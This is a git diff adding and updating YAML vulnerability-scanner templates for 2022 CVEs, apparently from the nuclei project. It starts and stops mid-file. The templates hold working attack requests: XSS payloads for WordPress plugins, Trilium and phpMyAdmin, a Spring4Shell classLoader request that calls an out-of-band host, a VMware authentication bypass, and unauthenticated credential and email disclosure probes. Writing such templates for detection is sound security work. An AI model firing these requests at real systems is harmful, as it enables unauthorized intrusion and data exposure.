+        POST /backend/cms HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-OCTOBER-REQUEST-HANDLER: onOpenTemplate
+        X-OCTOBER-REQUEST-PARTIALS:
+        X-Requested-With: XMLHttpRequest
+
+        _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm
+
+    cookie-reuse: true
+
+    extractors:
+      - type: xpath
+        name: session_key
+        attribute: value
+        xpath:
+          - "/html/body/div[1]/div/div[2]/div/div/form/input[1]"
+        internal: true
+        # Obtain _session_key for current OctoberCMS session
+
+      - type: xpath
+        name: token
+        attribute: value
+        xpath:
+          - "/html/body/div[1]/div/div[2]/div/div/form/input[2]"
+        internal: true
+        # Obtain _token for current OctoberCMS session
+
+      - type: regex
+        name: theme
+        part: body
+        group: 1
+        regex:
+          - '<input\stype=\\"hidden\\"\svalue=\\"demo\\"\sname=\\"([^"]*)\\"'
+        internal: true
+        # Obtain current theme used for Markup editor of OctoberCMS
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'function onInit()'
+          - 'phpinfo()'
+          - 'Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`.'
+        condition: and
+        # if exploit executes, phpinfo() should now be exposed at the /{{randstr}} endpoint, even though Safe mode is enabled
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-2187.yaml b/cves/2022/CVE-2022-2187.yaml
new file mode 100644
index 0000000000..e5a0b61f6a
--- /dev/null
+++ b/cves/2022/CVE-2022-2187.yaml
@@ -0,0 +1,41 @@
+id: CVE-2022-2187
+
+info:
+  name: Contact Form 7 Captcha < 0.1.2 - Cross-Site Scripting
+  author: For3stCo1d
+  severity: medium
+  description: |
+    The Contact Form 7 Captcha WordPress plugin before 0.1.2 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers
+  reference:
+    - https://wpscan.com/vulnerability/4fd2f1ef-39c6-4425-8b4d-1a332dabac8d
+    - https://wordpress.org/plugins/contact-form-7-simple-recaptcha
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2187
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-2187
+    cwe-id: CWE-79
+  tags: wpscan,cve,cve2022,wordpress,xss,wp-plugin,wp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&"></script><script>alert(document.domain)</script>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
+          - "Contact Form 7"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-22536.yaml b/cves/2022/CVE-2022-22536.yaml
index 7c43a0bb2e..6afb76b607 100644
--- a/cves/2022/CVE-2022-22536.yaml
+++ b/cves/2022/CVE-2022-22536.yaml
@@ -4,9 +4,7 @@ info:
   name: SAP Memory Pipes (MPI) Desynchronization
   author: pdteam
   severity: critical
-  description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation
-    attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack
-    could result in complete compromise of Confidentiality, Integrity and Availability of the system.
+  description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2022-22536
     - https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022
@@ -14,10 +12,12 @@ info:
     - https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-score: 10
     cve-id: CVE-2022-22536
     cwe-id: CWE-444
-  tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes
+  metadata:
+    shodan-query: http.favicon.hash:-266008933
+  tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes,kev
 
 requests:
   - raw:
diff --git a/cves/2022/CVE-2022-2290.yaml b/cves/2022/CVE-2022-2290.yaml
new file mode 100644
index 0000000000..48553b4892
--- /dev/null
+++ b/cves/2022/CVE-2022-2290.yaml
@@ -0,0 +1,48 @@
+id: CVE-2022-2290
+
+info:
+  name: Trilium - Cross-Site Scripting
+  author: dbrwsky
+  severity: medium
+  description: Cross-site Scripting (XSS) - Reflected in GitHub repository zadam/trilium prior to 0.52.4, 0.53.1-beta.
+  reference:
+    - https://huntr.dev/bounties/367c5c8d-ad6f-46be-8503-06648ecf09cf/
+    - https://github.com/zadam/trilium
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-2290
+    - https://github.com/zadam/trilium/commit/3faae63b849a1fabc31b823bb7af3a84d32256a7
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-2290
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: title:"Trilium Notes"
+    verified: "true"
+  tags: cve,cve2022,xss,trilium,huntr
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E'
+      - '{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E'
+      - '{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "No handler matched for custom <img src=x onerror=alert(document.domain)>"
+          - "Note '<img src=x onerror=alert(document.domain)>' not found"
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 404
diff --git a/cves/2022/CVE-2022-22947.yaml b/cves/2022/CVE-2022-22947.yaml
index 8c77748f47..2b859809f8 100644
--- a/cves/2022/CVE-2022-22947.yaml
+++ b/cves/2022/CVE-2022-22947.yaml
@@ -4,8 +4,7 @@ info:
   name: Spring Cloud Gateway Code Injection
   author: pdteam
   severity: critical
-  description: Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker
-    could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.
+  description: Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2022-22947
     - https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/
@@ -13,8 +12,11 @@ info:
     - https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published
     - https://tanzu.vmware.com/security/cve-2022-22947
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
     cve-id: CVE-2022-22947
-  tags: cve,cve2022,apache,spring,vmware,actuator,oast
+    cwe-id: CWE-94
+  tags: cve,cve2022,apache,spring,vmware,actuator,oast,kev
 
 requests:
   - raw:
diff --git a/cves/2022/CVE-2022-22954.yaml b/cves/2022/CVE-2022-22954.yaml
index 7c8bd55cf5..886c9cc465 100644
--- a/cves/2022/CVE-2022-22954.yaml
+++ b/cves/2022/CVE-2022-22954.yaml
@@ -1,21 +1,24 @@
 id: CVE-2022-22954
 
 info:
-  name: VMware Workspace ONE Access - Freemarker SSTI
+  name: VMware Workspace ONE Access - Server-Side Template Injection
   author: sherlocksecurity
   severity: critical
-  description: An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. Successful exploitation
-    could result in remote code execution by exploiting a server-side template injection flaw.
+  description: |
+    VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.
   reference:
     - https://www.tenable.com/blog/vmware-patches-multiple-vulnerabilities-in-workspace-one-vmsa-2022-0011
+    - https://www.vmware.com/security/advisories/VMSA-2022-0011.html
+    - http://packetstormsecurity.com/files/166935/VMware-Workspace-ONE-Access-Template-Injection-Command-Execution.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-22954
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2022-22954
-    cwe-id: CWE-22
+    cwe-id: CWE-94
   metadata:
     shodan-query: http.favicon.hash:-1250474341
-  tags: cve,cve2022,vmware,ssti,workspaceone
+  tags: workspaceone,kev,tenable,packetstorm,cve,cve2022,vmware,ssti
 
 requests:
   - method: GET
@@ -25,9 +28,12 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "Authorization context is not valid"
 
       - type: status
         status:
-          - 400
\ No newline at end of file
+          - 400
+
+# Enhanced by mp on 2022/05/19
diff --git a/cves/2022/CVE-2022-22963.yaml b/cves/2022/CVE-2022-22963.yaml
index f0cceb1d51..f08a8e8a9e 100644
--- a/cves/2022/CVE-2022-22963.yaml
+++ b/cves/2022/CVE-2022-22963.yaml
@@ -1,18 +1,24 @@
 id: CVE-2022-22963
 
 info:
-  name: Spring Cloud Function SPEL RCE
+  name: Spring Cloud - Remote Code Execution
   author: Mr-xn,Adam Crosser
   severity: critical
+  description: |
+    Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.
   reference:
     - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f
     - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE
     - https://tanzu.vmware.com/security/cve-2022-22963
     - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/
     - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-22963
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2022-22963
-  tags: cve,cve2022,springcloud,rce
+    cwe-id: CWE-94
+  tags: vulhub,cve,cve2022,springcloud,rce,kev
 
 requests:
   - raw:
@@ -36,3 +42,5 @@ requests:
       - type: status
         status:
           - 500
+
+# Enhanced by mp on 2022/05/19
diff --git a/cves/2022/CVE-2022-22965.yaml b/cves/2022/CVE-2022-22965.yaml
index 1a4310a65d..bfbd008378 100644
--- a/cves/2022/CVE-2022-22965.yaml
+++ b/cves/2022/CVE-2022-22965.yaml
@@ -1,30 +1,40 @@
 id: CVE-2022-22965
 
 info:
-  name: Spring Framework RCE via Data Binding on JDK 9+ (Spring4Shell)
+  name: Spring Framework - Remote Code Execution
   author: justmumu,arall,dhiyaneshDK,akincibor
   severity: critical
-  description: A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR
-    deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other
-    ways to exploit it.
+  description: |
+    A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.
   reference:
     - https://tanzu.vmware.com/security/cve-2022-22965
     - https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/
     - https://twitter.com/RandoriAttack/status/1509298490106593283
     - https://mp.weixin.qq.com/s/kgw-O4Hsd9r2vfme3Y2Ynw
     - https://twitter.com/_0xf4n9x_/status/1509935429365100546
+    - https://nvd.nist.gov/vuln/detail/cve-2022-22965
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2022-22965
-    cwe-id: CWE-770
-  remediation: 5.3.x users should upgrade to 5.3.18+, 5.2.x users should upgrade to 5.2.20+.
-  tags: cve,cve2022,rce,spring,injection,oast,intrusive
+    cwe-id: CWE-94
+  tags: cve,cve2022,rce,spring,injection,oast,intrusive,kev
 
 requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/?class.module.classLoader.resources.context.configFile=https://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx"
+  - raw:
+      - |
+        POST {{BaseURL}} HTTP/1.1
+        Content-Type: application/x-www-form-urlencoded
+
+        class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx
+
+      - |
+        GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
+
+    payloads:
+      interact_protocol:
+        - http
+        - https
 
     matchers-condition: and
     matchers:
@@ -38,26 +48,3 @@ requests:
         words:
           - "User-Agent: Java"
         case-insensitive: true
-
-  - method: POST
-    path:
-      - "{{BaseURL}}"
-
-    headers:
-      Content-Type: application/x-www-form-urlencoded
-
-    body: |
-      class.module.classLoader.resources.context.configFile=https://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: interactsh_protocol # Confirms the HTTP Interaction
-        words:
-          - "http"
-
-      - type: word
-        part: interactsh_request
-        words:
-          - "User-Agent: Java"
-        case-insensitive: true
\ No newline at end of file
diff --git a/cves/2022/CVE-2022-22972.yaml b/cves/2022/CVE-2022-22972.yaml
new file mode 100644
index 0000000000..825cf0625b
--- /dev/null
+++ b/cves/2022/CVE-2022-22972.yaml
@@ -0,0 +1,106 @@
+id: CVE-2022-22972
+
+info:
+  name: VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass
+  author: For3stCo1d,princechaddha
+  severity: critical
+  description: |
+    VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
+  reference:
+    - https://github.com/horizon3ai/CVE-2022-22972
+    - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive
+    - https://www.vmware.com/security/advisories/VMSA-2022-0014.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-22972
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-22972
+    cwe-id: CWE-287
+  metadata:
+    fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize"
+  tags: cve,cve2022,vmware,auth-bypass,oast
+
+requests:
+  - raw:
+      - |
+        GET /vcac/ HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1
+        Host: {{interactsh-url}}
+        Content-type: application/x-www-form-urlencoded
+
+        protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in
+
+    redirects: true
+    max-redirects: 3
+    cookie-reuse: true
+    extractors:
+      - type: regex
+        part: body
+        name: protected_state
+        group: 1
+        regex:
+          - 'id="protected_state" value="([a-zA-Z0-9]+)"\/>'
+        internal: true
+
+      - type: regex
+        part: body
+        name: horizonRelayState
+        group: 1
+        regex:
+          - 'name="horizonRelayState" value="([a-z0-9-]+)"\/>'
+        internal: true
+
+      - type: regex
+        part: body
+        name: userstore
+        group: 1
+        regex:
+          - 'id="userstore" value="([a-z.]+)" \/>'
+        internal: true
+
+      - type: regex
+        part: body
+        name: userstoreDisplay
+        group: 1
+        regex:
+          - 'id="userstoreDisplay" readonly class="login-input transparent_class" value="(.*)"/>'
+        internal: true
+
+      - type: regex
+        part: body
+        name: stickyConnectorId
+        group: 1
+        regex:
+          - 'name="stickyConnectorId" value="(.*)"/>'
+        internal: true
+
+      - type: kval
+        part: header
+        name: HZN-Cookie
+        kval:
+          - 'HZN'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "HZN="
+
+      - type: status
+        status:
+          - 302
+
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+# Enhanced by mp on 2022/06/01
diff --git a/cves/2022/CVE-2022-23131.yaml b/cves/2022/CVE-2022-23131.yaml
index 54817847e0..0e182ea627 100644
--- a/cves/2022/CVE-2022-23131.yaml
+++ b/cves/2022/CVE-2022-23131.yaml
@@ -10,15 +10,16 @@ info:
     - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
     - https://nvd.nist.gov/vuln/detail/CVE-2022-23131
     - https://github.com/1mxml/CVE-2022-23131
+  remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher.
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2022-23131
-  remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher.
+    cwe-id: CWE-290
   metadata:
-    shodan-query: http.favicon.hash:892542951
     fofa-query: app="ZABBIX-监控系统" && body="saml"
-  tags: cve,cve2022,zabbix,auth-bypass,saml,sso
+    shodan-query: http.favicon.hash:892542951
+  tags: cve,cve2022,zabbix,auth-bypass,saml,sso,kev
 
 requests:
   - method: GET
diff --git a/cves/2022/CVE-2022-23134.yaml b/cves/2022/CVE-2022-23134.yaml
index 7ce7d9a3e7..d3252104e3 100644
--- a/cves/2022/CVE-2022-23134.yaml
+++ b/cves/2022/CVE-2022-23134.yaml
@@ -4,16 +4,17 @@ info:
   name: Zabbix Setup Configuration Authentication Bypass
   author: bananabr
   severity: medium
-  description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially
-    change the configuration of Zabbix Frontend.
+  description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
   reference:
     - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
     - https://nvd.nist.gov/vuln/detail/CVE-2022-23134
+    - https://support.zabbix.com/browse/ZBX-20384
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6SZYHXINBKCY42ITFSNCYE7KCSF33VRA/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
     cvss-score: 5.3
     cve-id: CVE-2022-23134
-  tags: cve,cve2022,zabbix,auth-bypass
+  tags: cve,cve2022,zabbix,auth-bypass,kev
 
 requests:
   - method: GET
diff --git a/cves/2022/CVE-2022-23178.yaml b/cves/2022/CVE-2022-23178.yaml
index 7a96697197..0595e29a98 100644
--- a/cves/2022/CVE-2022-23178.yaml
+++ b/cves/2022/CVE-2022-23178.yaml
@@ -4,12 +4,12 @@ info:
   name: Crestron Device - Credentials Disclosure
   author: gy741
   severity: critical
-  description: An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are
-    valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.
+  description: An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.
   reference:
     - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-009/-credential-disclosure-in-web-interface-of-crestron-device
     - https://nvd.nist.gov/vuln/detail/CVE-2022-23178
     - https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E
+    - https://www.redteam-pentesting.de/advisories/rt-sa-2021-009
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2022/CVE-2022-23347.yaml b/cves/2022/CVE-2022-23347.yaml
index 7059ae4b38..33fd19a910 100644
--- a/cves/2022/CVE-2022-23347.yaml
+++ b/cves/2022/CVE-2022-23347.yaml
@@ -1,20 +1,22 @@
 id: CVE-2022-23347
 
 info:
-  name: BigAnt Software BigAnt Server v5.6.06 - Directory Traversal
+  name: BigAnt Server v5.6.06 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: BigAnt Software BigAnt Server v5.6.06 was discovered to be vulnerable to directory traversal attacks.
+  description: BigAnt Server v5.6.06 is vulnerable to local file inclusion.
   reference:
     - https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23347
-    - https://www.cvedetails.com/cve/CVE-2022-23347
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-23347
+    - http://bigant.com
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2022-23347
     cwe-id: CWE-22
   metadata:
     shodan-query: http.html:"BigAnt"
+    verified: "true"
   tags: cve,cve2022,bigant,lfi
 
 requests:
@@ -35,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/29
diff --git a/cves/2022/CVE-2022-23348.yaml b/cves/2022/CVE-2022-23348.yaml
new file mode 100644
index 0000000000..64d7a50af4
--- /dev/null
+++ b/cves/2022/CVE-2022-23348.yaml
@@ -0,0 +1,45 @@
+id: CVE-2022-23348
+
+info:
+  name: BigAnt Server v5.6.06 - Improper Access control
+  author: arafatansari
+  severity: medium
+  description: |
+    BigAnt Server v5.6.06 suffers from Use of Password Hash With Insufficient Computational Effort.
+  reference:
+    - https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23348
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-23348
+    - http://bigant.com
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2022-23348
+    cwe-id: CWE-916
+  metadata:
+    shodan-query: http.html:"bigant"
+    verified: "true"
+  tags: cve,cve2022,bigant,unauth,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Runtime/Data/ms_admin.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"user_name";'
+          - '"user_pwd";'
+          - '"user_id";'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-2376.yaml b/cves/2022/CVE-2022-2376.yaml
new file mode 100644
index 0000000000..a06ad6605c
--- /dev/null
+++ b/cves/2022/CVE-2022-2376.yaml
@@ -0,0 +1,41 @@
+id: CVE-2022-2376
+
+info:
+  name: Directorist < 7.3.1 - Unauthenticated Email Address Disclosure
+  author: Random-Robbie
+  severity: medium
+  description: The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and any authenticated users
+  reference:
+    - https://wpscan.com/vulnerability/437c4330-376a-4392-86c6-c4c7ed9583ad
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2376
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-2376
+  remediation: Fixed in version 7.3.1
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2022-2376
+    cwe-id: CWE-862
+  tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'directorist-authors__card__details__top'
+          - 'directorist-authors__card__info-list'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-23808.yaml b/cves/2022/CVE-2022-23808.yaml
index a75c89c2f3..b174bac40d 100644
--- a/cves/2022/CVE-2022-23808.yaml
+++ b/cves/2022/CVE-2022-23808.yaml
@@ -2,41 +2,48 @@ id: CVE-2022-23808
 
 info:
   name: phpMyAdmin < 5.1.2 - Cross-Site Scripting
-  author: cckuailong
+  author: cckuailong,daffainfo
   severity: medium
   description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.
   reference:
     - https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A
     - https://github.com/dipakpanchal456/CVE-2022-23808
     - https://nvd.nist.gov/vuln/detail/CVE-2022-23808
+    - https://www.phpmyadmin.net/security/PMASA-2022-2/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2022-23808
     cwe-id: CWE-79
+  metadata:
+    verified: true
+    shodan-query: http.component:"phpmyadmin"
   tags: cve,cve2022,phpmyadmin,xss
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/setup/index.php?page=servers&mode=test&id=\">'><script>alert(document.domain)</script>"
-      - "{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=\">'><script>alert(document.domain)</script>"
+      - "{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+      - "{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
 
     stop-at-first-match: true
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
+
+      - type: word
+        part: body
+        words:
+          - "\"></script><script>alert(document.domain)</script>"
+          - "<h2>Add a new server</h2>"
+          - "<title>phpMyAdmin setup"
+        condition: and
 
       - type: word
         part: header
         words:
           - "text/html"
 
-      - type: word
-        part: body
-        words:
-          - "\">'><script>alert(document.domain)</script>"
-
+      - type: status
+        status:
+          - 200
 # Enhanced by mp on 2022/03/08
diff --git a/cves/2022/CVE-2022-2383.yaml b/cves/2022/CVE-2022-2383.yaml
new file mode 100644
index 0000000000..997326cf9a
--- /dev/null
+++ b/cves/2022/CVE-2022-2383.yaml
@@ -0,0 +1,42 @@
+id: CVE-2022-2383
+
+info:
+  name: Feed Them Social < 3.0.1 - Cross-Site Scripting
+  author: akincibor
+  severity: medium
+  description: |
+    The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.
+  reference:
+    - https://wpscan.com/vulnerability/4a3b3023-e740-411c-a77c-6477b80d7531
+    - https://wordpress.org/plugins/feed-them-social/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2383
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-2383
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-2383
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: wp,wordpress,wp-plugin,wpscan,cve,cve2022,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<img src onerror=alert(document.domain)><br/>'
+
+      - type: word
+        part: header
